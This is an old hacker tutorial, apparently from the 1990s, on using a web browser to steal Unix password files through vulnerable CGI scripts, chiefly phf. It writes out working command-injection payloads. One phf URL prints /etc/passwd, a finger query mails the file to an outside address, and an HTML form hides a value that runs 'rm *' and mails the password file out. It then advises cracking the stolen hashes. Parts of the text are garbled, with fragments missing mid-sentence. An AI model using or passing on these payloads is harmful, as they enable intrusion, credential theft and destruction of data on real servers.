Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
CI - Introduction
This file will describe several techiniques to aquire a password file just b
y using an ordinary web browser. The information provided will be best descr
ibed for the beginner hacker, but all hackers should benifit from this infor
mation. We will only cov
er phf in this file but, feel free to explore other programs in the cgi directory
such as nph-test-cgi or test-cgi. And now . . . get comfortable... sit back....
and read.
There are several techniques on what I call "Web Browser Hacking". Many beg
inners dont know that you cant query a etc/passwd file from your browser an
d in this chapter I will describe all the ways to aquire a passwd file. Fir
st you need to find a box t
hat is running the cgi-bin/phf file on their system. A great way to find out
without trial and error is to go to www.altavista.com and just search on cg
i-bin AND perl.exe or cgi-bin AND phf.
for a mailto on the web page... just scan the page for any mailto refs. Go b
ack to the finger box and type in this query...... nobody@nowhere.org ; /bin
/mail me@junk.org < etc/passwd ...this string takes nobody and emails the pa
sswd file to your email
address. If this works you now have the etc/passwd file in your mailbox.... y
ou can now run a crack program against it and have a little fun on their box.
oved you should get a series of search boxes on the next page ( ignore th
ese boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/e
tc/passwd... so the entire string would look like this Http://www.aol.com
/cgi-bin/phf?Qalias=x%0a/bin/cat%20
/etc/passwd. This string will print out the etc/passwd file strait to your web
browser all you need to do is save it as a file and again run a crack program a
gainst it. (This is considering that they are not :*: or :x:).
This is a simple form that asks a user to input a message to be sent to a scri
pt called doc.pl. Included in the doc.pl script is the following line which is
assuming the line has already been parsed out.
<html><body>
<h2>Hack AOL</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get">
<input type="hidden" name="myaddress"
value=" ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;">
<input type = "text" name="input">
<input type = "submit" value=:"getpasswd">
</form>
The semicolons in the hidden value field act as delimiters, they separate
the UNIX commands, this executes commands on the same line. The system cal
l in PERL and creates a UNIX shell, and in here mails the passwd file to y
ou.
III - Conclusion
ond file that will involve erasing log files from the web browser. I hope you
all enjoyed this documentation and found it somewhat interesting...... wake
up!!! thus I conclude.....
Modify.
IV - Suggested Reading
Phrack Magazine: Very informative.... covers just about everything from phr
eaking to hacking.... Just download all the damn articles.
Building Internet Firewalls by O'Reilly & Associates, Inc. aka "The Big Wood
en Door"": Covers all kinds of attacks, different firewall solutions, and in
vulnerablities.
Perl in 21 days by Samsnet: Good starting book in Perl programming also cov
ers security issues.
Cgi programming by Samsnet: Good starter for Cgi but if you dont know Per
l or C programming then dont bother, also covers security issues.
*************************************************************
***********
www.technophoria.com